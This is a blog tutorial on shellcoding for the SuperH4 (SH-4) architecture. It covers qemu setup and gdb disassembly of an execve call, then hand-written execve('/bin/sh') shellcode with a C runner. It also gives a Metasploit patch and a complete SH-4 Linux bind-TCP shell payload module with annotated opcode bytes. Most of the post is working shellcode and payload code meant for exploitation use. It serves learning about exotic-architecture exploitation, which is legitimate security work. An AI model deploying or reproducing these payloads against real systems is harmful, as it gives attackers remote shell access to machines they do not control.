Friday, June 24, 2011

SH4 fun

# Description

A brief tutorial on the SuperH4 (SH-4) architecture.

# Specs

We will focus on the simple SH-4, also referred to as the SH7750 series. To start such an adventure we need a precise description of this subtle architecture, and after some guessing we land on the SuperH7750 Software Reference manual.

Among other things, it contains the opcode list for this processor! As we won't write shellcode on a sheet of paper, the next step is to set up the whole environment. You have two possibilities here: boot your ultra rare SuperH machine, or emulate it with qemu. Let's describe the latter.

# Qemu setup

First thing that comes to mind when you have to deal with an uncommon architecture: google "aurel32 #REPLACE_WITH_ARCH". This Debian man did awesome work setting up Debian qemu images for arm, ..., sh4. So download the following files :




By following the README, we launch qemu-system-sh4 with the following flags :

qemu-system-sh4 -M r2d -kernel vmlinuz-2.6.32-5-sh7751r -initrd initrd.img-2.6.32-5-sh7751r -hda debian_sid_sh4_standard.qcow2 -append "root=/dev/sda1 console=tty0 noiotrap" -net nic -net user -redir tcp:2222::22

Note that I added the TCP redirection to be able to ssh in directly. Don't forget to run "aptitude update && aptitude upgrade": as this is an old release you will have some stuff to update, and unfortunately this emulated machine is slow as hell (btw you can fully read the specs in the meantime :).

# Shellcoding

First step: executing "/bin/sh" via a shellcode. Our architecture works essentially with registers, and according to the MSDN documentation [1] we can identify their roles :

 R0         Return values

 R1         Temp register
 R2         Temp register
 R3         Temp register

 R4         First function argument
 R5         Second function argument
 R6         Third function argument
 R7         Fourth function argument

 R8         Permanent register
 R9         Permanent register
 R10        Permanent register
 R11        Permanent register
 R12        Permanent register
 R13        Permanent register

 R14        Default frame pointer

 R15        Stack pointer

Now let's analyze how gcc compiles a simple execve program :

root@debian-sh4:~# cat execve.c
void getshell()
{
   char *str = "//bin/sh";
   execve(str, 0, 0);
}

void main()
{
   getshell();
}
root@debian-sh4:~# gcc execve.c -o execve -g

We load it into our sh4 gdb :

root@debian-sh4:~# gdb -q execve
Reading symbols from /root/execve...done.
(gdb) disassemble main
Dump of assembler code for function main:
  0x004004f8 <+0>:     mov.l   r14,@-r15
  0x004004fa <+2>:     sts.l   pr,@-r15
  0x004004fc <+4>:     mov     r15,r14
  0x004004fe <+6>:     mov.l   0x400510 <main+24>,r1   ! 0x4004c0 <getshell>
  0x00400500 <+8>:     jsr     @r1
  0x00400502 <+10>:    nop
  0x00400504 <+12>:    mov     r14,r15
  0x00400506 <+14>:    lds.l   @r15+,pr
  0x00400508 <+16>:    mov.l   @r15+,r14
  0x0040050a <+18>:    rts
  0x0040050c <+20>:    nop
  0x0040050e <+22>:    nop
  0x00400510 <+24>:    .word 0x04c0
  0x00400512 <+26>:    .word 0x0040
End of assembler dump.

A subroutine call is done with the jsr @reg instruction (the nop right after it fills the delay slot). Next step: the disassembly of the "getshell" function.

(gdb) disassemble getshell
Dump of assembler code for function getshell:
  0x004004c0 <+0>:     mov.l   r14,@-r15
  0x004004c2 <+2>:     sts.l   pr,@-r15
  0x004004c4 <+4>:     add     #-4,r15
  0x004004c6 <+6>:     mov     r15,r14
  0x004004c8 <+8>:     mov     r14,r1
  0x004004ca <+10>:    add     #-60,r1
  0x004004cc <+12>:    mov.l   0x4004f0 <getshell+48>,r2       ! 0x40063c
  0x004004ce <+14>:    mov.l   r2,@(60,r1)
  0x004004d0 <+16>:    mov     r14,r1
  0x004004d2 <+18>:    add     #-60,r1
  0x004004d4 <+20>:    mov.l   @(60,r1),r1
  0x004004d6 <+22>:    mov     r1,r4
  0x004004d8 <+24>:    mov     #0,r5
  0x004004da <+26>:    mov     #0,r6
  0x004004dc <+28>:    mov.l   0x4004f4 <getshell+52>,r1       ! 0x400378 <execve@plt>
  0x004004de <+30>:    jsr     @r1
  0x004004e0 <+32>:    nop
  0x004004e2 <+34>:    add     #4,r14
  0x004004e4 <+36>:    mov     r14,r15
  0x004004e6 <+38>:    lds.l   @r15+,pr
  0x004004e8 <+40>:    mov.l   @r15+,r14
  0x004004ea <+42>:    rts
  0x004004ec <+44>:    nop
  0x004004ee <+46>:    nop
  0x004004f0 <+48>:    mov.b   @(r0,r3),r6
  0x004004f2 <+50>:    .word 0x0040
  0x004004f4 <+52>:    .word 0x0378
  0x004004f6 <+54>:    .word 0x0040
End of assembler dump.
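
The odd entries at the end of both dumps (the .word lines, and the mov.b @(r0,r3),r6 at getshell+48) are not code: gdb is disassembling the literal pool that the PC-relative mov.l loads read from. A minimal Ruby sketch, using only values visible in the dumps above, shows how two little-endian 16-bit words combine into the 32-bit constant. Reading mov.b @(r0,r3),r6 as the value 0x063c is my own decoding of the opcode table, so treat it as an assumption; the helper name is made up for the example.

```ruby
# Join two consecutive 16-bit words (as gdb prints them) into the
# little-endian 32-bit constant that mov.l actually loads.
def literal(low_word, high_word)
  [low_word, high_word].pack('v2').unpack('V').first
end

# main+24 / main+26: address of getshell
printf("0x%08x\n", literal(0x04c0, 0x0040))   # 0x004004c0

# getshell+48 / getshell+50: "mov.b @(r0,r3),r6" is assumed to be the
# 16-bit value 0x063c, i.e. the low half of the string address
printf("0x%08x\n", literal(0x063c, 0x0040))   # 0x0040063c
```

Both results match the values gdb annotates after the "!" on the corresponding mov.l lines.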

Focusing on the execve function call, we can see that the address of our "//bin/sh" string is loaded in r4, then 0 in r5 and r6. In our shellcode we will only use syscalls, to be as independent as possible. One step deeper, we have the execve@plt disassembly (not yet resolved by the dynamic linker) :

(gdb) disassemble execve
Dump of assembler code for function execve@plt:
  0x00400378 <+0>:     mov.l   0x40038c <execve@plt+20>,r0     ! 0x41076c <_GLOBAL_OFFSET_TABLE_+20>
  0x0040037a <+2>:     mov.l   @r0,r0
  0x0040037c <+4>:     mov.l   0x400388 <execve@plt+16>,r1     ! 0x400324
  0x0040037e <+6>:     jmp     @r0
  0x00400380 <+8>:     mov     r1,r0
  0x00400382 <+10>:    mov.l   0x400390 <execve@plt+24>,r1     ! 0x18
  0x00400384 <+12>:    jmp     @r0
  0x00400386 <+14>:    nop
  0x00400388 <+16>:    mov.b   r2,@(r0,r3)
  0x0040038a <+18>:    .word 0x0040
  0x0040038c <+20>:    mov.b   @(r0,r6),r7
  0x0040038e <+22>:    .word 0x0041
  0x00400390 <+24>:    sett
  0x00400392 <+26>:    .word 0x0000
End of assembler dump.

We run it once so that the symbol gets resolved :

(gdb) r
Starting program: /root/execve
Got object file from memory but can't read symbols: File format not recognized.
process 32715 is executing new program: /bin/dash
# exit

Program exited normally.
(gdb) disassemble execve
Dump of assembler code for function execve:
  0x29625d40 <+0>:     mov.l   r12,@-r15
  0x29625d42 <+2>:     mova    0x29625d9c <execve+92>,r0
  0x29625d44 <+4>:     mov.l   0x29625d9c <execve+92>,r12      ! 0xb7a34
  0x29625d46 <+6>:     mov     #11,r3
  0x29625d48 <+8>:     add     r0,r12
  0x29625d4a <+10>:    trapa   #19
  0x29625d4c <+12>:    or      r0,r0
  0x29625d4e <+14>:    or      r0,r0
  0x29625d50 <+16>:    or      r0,r0
  0x29625d52 <+18>:    or      r0,r0
  0x29625d54 <+20>:    or      r0,r0
  0x29625d56 <+22>:    mov.w   0x29625d98 <execve+88>,r1       ! 0xf000
  0x29625d58 <+24>:    cmp/hi  r1,r0
  0x29625d5a <+26>:    bt.s    0x29625d80 <execve+64>
  0x29625d5c <+28>:    mov     r0,r3
  0x29625d5e <+30>:    rts
  0x29625d60 <+32>:    mov.l   @r15+,r12
  0x29625d62 <+34>:    nop
  0x29625d7e <+62>:    nop
  0x29625d80 <+64>:    mov.l   0x29625d8c <execve+76>,r0       ! 0x198
  0x29625d82 <+66>:    stc     gbr,r1
  0x29625d84 <+68>:    mov.l   @(r0,r12),r0
  0x29625d86 <+70>:    bra     0x29625d90 <execve+80>
  0x29625d88 <+72>:    add     r0,r1
  0x29625d8a <+74>:    nop
  0x29625d8c <+76>:    .word 0x0198
  0x29625d8e <+78>:    .word 0x0000
  0x29625d90 <+80>:    neg     r3,r3
  0x29625d92 <+82>:    mov.l   r3,@r1
  0x29625d94 <+84>:    bra     0x29625d5e <execve+30>
  0x29625d96 <+86>:    mov     #-1,r0
  0x29625d98 <+88>:    fadd    fr0,fr0
  0x29625d9a <+90>:    nop
  0x29625d9c <+92>:    add     #52,r10
  0x29625d9e <+94>:    rts
End of assembler dump.

Better. This "trapa" instruction looks interesting, with 11 in r3. Let's check the execve syscall number :

root@debian-sh4:~# grep execve /usr/include/asm/unistd_32.h
#define __NR_execve              11

So r3 holds the syscall number and r4 the string address, perfect. Instructions are pretty limited and we can only push registers on the "stack", so pushing a single byte costs two 2-byte instructions, i.e. 4 bytes of code :

mov #imm, reg
mov reg,@-r15
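
To make the 4-byte cost concrete, here is a rough Ruby sketch that encodes the two instructions. The bit layouts (0xEnii for mov #imm,Rn and 0x2nm6 for mov.l Rm,@-Rn) are my reading of the opcode list, and they agree with the bytes used in the Metasploit payload later in this post. The helper names mov_imm and push are invented for the example.

```ruby
# mov #imm,Rn -> 1110 nnnn iiii iiii (imm is a signed 8-bit value)
def mov_imm(imm, rn)
  raise ArgumentError, 'immediate must fit in 8 signed bits' unless (-128..127).cover?(imm)
  [0xE000 | (rn << 8) | (imm & 0xff)].pack('v')
end

# mov.l Rm,@-Rn -> 0010 nnnn mmmm 0110 (pre-decrement store, a push when Rn is r15)
def push(rm, rn = 15)
  [0x2006 | (rn << 8) | (rm << 4)].pack('v')
end

code = mov_imm(0x2f, 2) + push(2)   # push the byte '/' as a full 32-bit word
puts code.bytesize                   # 4
puts code.unpack('C*').map { |b| format('%02x', b) }.join(' ')   # 2f e2 26 2f
```

The range check mirrors the assembler: anything outside -128..127 cannot be expressed in a single mov #imm.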

First thought is to build the string byte by byte (I get an assembler error with any immediate that does not fit in 8 bits, since mov #imm,Rn only takes a sign-extended 8-bit value) :

/* execve("/bin/sh", 0, 0); */
       add     #-8, r15
       mov     r15, r4
       mov     #110, r2
       shll8   r2
       add     #105, r2
       shll8   r2
       add     #98, r2
       shll8   r2
       add     #47, r2
       mov.l   r2, @r15
       add     #4, r15
       xor     r2, r2
       shll8   r2
       add     #104, r2
       shll8   r2
       add     #115, r2
       shll8   r2
       add     #47, r2
       mov.l   r2, @r15
       mov     #11, r3
       xor     r5, r5
       xor     r6, r6
       trapa   #19
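
The immediates in the listing above can be double-checked with a few lines of Ruby. This is only a sketch: it replays the mov / shll8 / add sequence on a simulated 32-bit register and compares the result with the string chunk stored as a little-endian word. It assumes every byte is below 0x80, because both mov #imm and add #imm sign-extend their operand. The helper names are made up.

```ruby
# Immediates to load, highest byte first, for one 4-byte chunk of the string.
def immediates_for(chunk)
  chunk.ljust(4, "\0").bytes.reverse
end

# Replay mov #imm followed by three (shll8, add #imm) pairs on a 32-bit register.
def replay(immediates)
  immediates.drop(1).reduce(immediates.first) do |r2, imm|
    ((r2 << 8) + imm) & 0xffffffff
  end
end

['/bin', '/sh'].each do |chunk|
  imms = immediates_for(chunk)
  word = replay(imms)
  # The register must hold the chunk as a little-endian 32-bit word.
  ok = [word].pack('V') == chunk.ljust(4, "\0").b
  printf("%-4s %-20s 0x%08x %s\n", chunk, imms.inspect, word, ok ? 'ok' : 'MISMATCH')
end
```

For "/sh" the first immediate is 0, which is what the xor r2, r2 in the listing provides.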

#include <stdio.h>
#include <string.h>

char code[] = 

int main()
{
   printf("len:%zu bytes\n", strlen(code));
   (*(void(*)()) code)();
   return 0;
}

But it is so fat! A ninja found a better way to do it here, but this example focuses on how to use the stack :)

# Metasploit ninja

We will add the SuperH4 architecture to metasploit :

% svn co
% svn diff
Index: lib/rex/constants.rb
--- lib/rex/constants.rb        (revision 13017)
+++ lib/rex/constants.rb        (working copy)
@@ -80,6 +80,9 @@
ARCH_TTY    = 'tty'
ARCH_ARMLE  = 'armle'
ARCH_ARMBE  = 'armbe'
+ARCH_SH4    = 'sh4'
+ARCH_SH4LE  = 'sh4le'
+ARCH_SH4BE  = 'sh4be'
ARCH_JAVA   = 'java'
@@ -95,6 +98,9 @@
+               ARCH_SH4,
+               ARCH_SH4LE,
+               ARCH_SH4BE,
Index: lib/rex/arch.rb
--- lib/rex/arch.rb     (revision 13017)
+++ lib/rex/arch.rb     (working copy)
@@ -63,6 +63,12 @@
                       when ARCH_ARMBE
+                       when ARCH_SH4
+                               [addr].pack('V')
+                       when ARCH_SH4LE
+                               [addr].pack('V')
+                       when ARCH_SH4BE
+                               [addr].pack('N')
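
The pack directives in the arch.rb patch are what decide the byte order of a packed address: 'V' is a 32-bit little-endian value and 'N' a 32-bit big-endian one. A small sketch, using the getshell address from the gdb session as a sample value (any address would do):

```ruby
addr = 0x004004c0   # sample value: address of getshell in the gdb session

le = [addr].pack('V')   # 32-bit little-endian, used for ARCH_SH4 and ARCH_SH4LE
be = [addr].pack('N')   # 32-bit big-endian, used for ARCH_SH4BE

puts le.unpack('C*').map { |b| format('%02x', b) }.join(' ')   # c0 04 40 00
puts be.unpack('C*').map { |b| format('%02x', b) }.join(' ')   # 00 40 04 c0
```

The little-endian form matches the literal pool seen earlier in gdb (.word 0x04c0 followed by .word 0x0040), which is why plain ARCH_SH4 is mapped to 'V' here.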

The ARCH_SH4, ARCH_SH4BE and ARCH_SH4LE constants are now recognized by rex! As an example, we can create the Metasploit module shell_bind_tcp.rb in modules/payloads/singles/linux/sh4/shell_bind_tcp.rb :

# $Id: shell_reverse_tcp.rb 12196 2011-04-01 00:51:33Z egypt $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

   include Msf::Payload::Single
   include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions

   def initialize(info = {})
       super(merge_info(info,
           'Name'          => 'Linux Command Shell, Bind TCP Inline',
           'Version'       => '$Revision: 1 $',
           'Description'   => 'Listen for a connection and spawn a command shell',
           'Author'        => 'Dad`',
           'License'       => MSF_LICENSE,
           'Platform'      => 'linux',
           'Arch'          => ARCH_SH4,
           'Handler'       => Msf::Handler::BindTcp,
           'Session'       => Msf::Sessions::CommandShellUnix,
           'Payload'       =>
               {
                   'Offsets' =>
                       {
                           'LPORT'    => [ 116, 'n' ],
                       },
                   'Payload' =>
                       #### Tested successfully on:
                       # Linux debian-sh4 2.6.39-2-sh7751r
                       # s = socket(2, 1, 0)
                       "\x66\xe3"        +#   mov     #102,r3
                       "\x02\xe4"        +#   mov     #2,r4
                       "\x01\xe5"        +#   mov     #1,r5
                       "\x6a\x26"        +#   xor     r6,r6
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x01\xe4"        +#   mov     #1,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # bind(s, {2, port, 16}, 16)
                       "\x03\x64"        +#   mov     r0,r4
                       "\x03\x68"        +#   mov     r0,r8
                       "\x2a\x22"        +#   xor     r2,r2
                       "\x26\x2f"        +#   mov.l   r2,@-r15
                       "\x15\xc7"        +#   mova    4000c8 <dup+0x18>,r0
                       "\x01\x62"        +#   mov.w   @r0,r2
                       "\x28\x42"        +#   shll16  r2
                       "\x02\x72"        +#   add     #2,r2
                       "\x26\x2f"        +#   mov.l   r2,@-r15
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x10\xe6"        +#   mov     #16,r6
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x02\xe4"        +#   mov     #2,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # listen(s, 0)
                       "\x83\x64"        +#   mov     r8,r4
                       "\x5a\x25"        +#   xor     r5,r5
                       "\x6a\x26"        +#   xor     r6,r6
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x04\xe4"        +#   mov     #4,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # fd = accept(s, 0, 0)
                       "\x83\x64"        +#   mov     r8,r4
                       "\x5a\x25"        +#   xor     r5,r5
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x05\xe4"        +#   mov     #5,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # dup2(fd, 2-1-0)
                       "\x03\x69"        +#   mov     r0,r9
                       "\x03\xea"        +#   mov     #3,r10
                       # <dup>:
                       "\xff\x7a"        +#   add     #-1,r10
                       "\x3f\xe3"        +#   mov     #63,r3
                       "\x93\x64"        +#   mov     r9,r4
                       "\xa3\x65"        +#   mov     r10,r5
                       "\x13\xc3"        +#   trapa   #19
                       "\x15\x4a"        +#   cmp/pl  r10
                       "\xf8\x89"        +#   bt      4000b0 <dup>
                       # execve(shell, 0, 0)
                       "\x0b\xe3"        +#   mov     #11,r3
                       "\x02\xc7"        +#   mova    4000cc <dup+0x1c>,r0
                       "\x03\x64"        +#   mov     r0,r4
                       "\x5a\x25"        +#   xor     r5,r5
                       "\x13\xc3"        +#   trapa   #19
                       "\x00\x00"        +#   LPORT
                       "\xff\xff"        +#   Junk
                       "/bin/sh"          #   Shell

               }
           ))

       register_options(
           [
               OptString.new('SHELL', [ true, "Shell to execute.", "/bin/sh" ])
           ], self.class)
   end

   def generate
       p = super

       sh = datastore['SHELL']
       p[120, sh.length] = sh

       p
   end

end

This is a simple example of a bind shell with a configurable LPORT and SHELL. Both live at the end of the payload, at offsets 116 and 120 respectively. Note that I am using the socketcall syscall to handle the socket, bind, listen and accept calls. The arguments are pushed onto the stack, a pointer to them is saved in r5, the socketcall syscall number (102) is stored in r3, and r4 selects the action that socketcall should execute. The dup2 calls (syscall 63) over the three standard file descriptors run in a loop that decrements r10.
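
The two offsets can be sanity-checked outside the framework. The sketch below is an illustration, not Metasploit code: the mova formula is my reading of the SH-4 manual, the instruction offsets 28 and 108 come from counting two bytes per instruction in the listing, the payload is replaced by filler bytes, and port 4444 is an arbitrary sample.

```ruby
# mova @(disp,PC),r0 yields (insn_offset & ~3) + 4 + disp * 4.
def mova_target(insn_offset, disp)
  (insn_offset & ~3) + 4 + disp * 4
end

LPORT_OFFSET = 116
SHELL_OFFSET = 120

# "\x15\xc7" sits at offset 28 and "\x02\xc7" at offset 108 in the listing.
puts mova_target(28, 0x15)    # 116
puts mova_target(108, 0x02)   # 120

# Stand-in for the real payload: 116 filler bytes instead of the code.
payload = ("\x00" * LPORT_OFFSET + "\x00\x00" + "\xff\xff" + '/bin/sh').b

lport = 4444                                   # hypothetical port
shell = '/bin/sh'
payload[LPORT_OFFSET, 2] = [lport].pack('n')   # 'n' = 16-bit big-endian
payload[SHELL_OFFSET, shell.length] = shell

# What the bind() block builds: mov.w reads LPORT little-endian, shll16
# moves it to the upper half, add #2 puts AF_INET (2) in the lower half.
port_le = payload[LPORT_OFFSET, 2].unpack('v').first
sockaddr_head = [((port_le << 16) + 2) & 0xffffffff].pack('V')
puts sockaddr_head.unpack('C*').map { |b| format('%02x', b) }.join(' ')   # 02 00 11 5c
```

The last line shows the first four bytes of the sockaddr_in as they land on the stack: the family in little-endian order, followed by the port still in network byte order.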

The shellcode is certainly far from optimal, but this is a first approach to this exotic architecture! I don't really know how to submit modules to the Metasploit framework, but if any of you knows ... :)

